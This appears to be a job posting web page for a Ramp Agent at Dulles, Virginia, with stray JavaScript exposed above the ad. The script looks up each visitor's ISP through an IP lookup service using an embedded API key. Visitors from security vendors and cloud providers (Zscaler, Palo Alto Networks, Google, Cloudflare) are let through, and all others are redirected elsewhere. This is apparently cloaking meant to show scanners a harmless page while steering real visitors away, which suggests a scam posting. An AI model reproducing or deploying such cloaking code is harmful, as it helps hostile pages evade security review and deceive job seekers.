Ramp Agent
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Ramp Agent to join our team at Dulles, Virginia.
Responsibilities:
- Assist with aircraft marshalling, parking, and repositioning on the tarmac
- Load and unload baggage, cargo, and freight efficiently and safely
- Conduct safety inspections and ensure compliance with all safety regulations
- Operate ground support equipment such as belt loaders, tugs, and pushback tractors
- Coordinate with flight crews and ground staff for timely aircraft servicing
- Maintain cleanliness and organization of ramp areas
Skills & Qualities:
- Strong physical stamina and ability to lift heavy objects
- Excellent communication and teamwork skills
- Attention to detail and safety consciousness
- Ability to work outdoors in various weather conditions
Benefits: Competitive pay, health insurance options, paid training, opportunities for advancement, and a dynamic work environment. Join us and contribute to safe and efficient airport operations!